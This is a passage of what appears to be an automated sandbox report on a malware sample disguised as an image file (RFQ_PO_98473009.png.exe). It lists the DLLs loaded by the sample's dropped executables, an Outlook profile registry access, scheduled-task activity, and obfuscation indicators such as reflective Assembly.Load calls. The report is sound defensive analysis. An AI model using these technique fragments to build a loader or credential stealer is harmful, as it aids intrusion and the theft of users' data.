                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: textinputframework.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: iconcodecservice.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: textinputframework.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: coreuicomponents.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Automated click: Continue
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: RFQ_PO_98473009.png.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: RFQ_PO_98473009.png.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: _.pdb source: Native_New-Nova.exe, 0000000A.00000002.3624684011.0000000002520000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3622736534.0000000002171000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000002.3634096660.0000000003611000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 0000000A.00000003.1209065105.0000000000769000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000003.1207936513.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3623510104.0000000002180000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000C.00000002.3633787175.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000003.1257785893.000000000055F000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3632429865.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3630979840.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3623045015.00000000021F1000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1263456666.0000000000628000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1257746964.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000003.1263777573.0000000000628000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3636507603.0000000004A70000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3620379539.0000000001F80000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.RFQ_PO_98473009.png.exe.4406870.3.raw.unpack, tJDSOWc3BWGGq4Qa2q.cs .Net Code: eBZH8Brly9 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.RFQ_PO_98473009.png.exe.7a10000.5.raw.unpack, tJDSOWc3BWGGq4Qa2q.cs .Net Code: eBZH8Brly9 System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Code function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 10_2_004019F0
                      Source: Native_snake01.exe.9.dr Static PE information: real checksum: 0x23bfb should be: 0x38b7d
                      Source: RFQ_PO_98473009.png.exe Static PE information: real checksum: 0x0 should be: 0xd0e2c
                      Source: lVbhkOPdhyxT.exe.0.dr Static PE information: real checksum: 0x0 should be: 0xd0e2c
                      Source: Native_New-Nova.exe.9.dr Static PE information: real checksum: 0x23bfb should be: 0x363da
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Code function: 10_2_0040E21D push ecx; ret 10_2_0040E230
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe Code function: 10_2_0618378D pushad ; iretd 10_2_06183799
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_3_05C8DA5C push D005C8DAh; retf 12_3_05C8DA61
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_0040E21D push ecx; ret 12_2_0040E230
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_022BE558 push eax; iretd 12_2_022BE559
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_022BFED1 push es; ret 12_2_022BFEE0
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_061C3562 push esp; iretd 12_2_061C3569
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe Code function: 12_2_06424F14 push es; ret 12_2_06424FC0
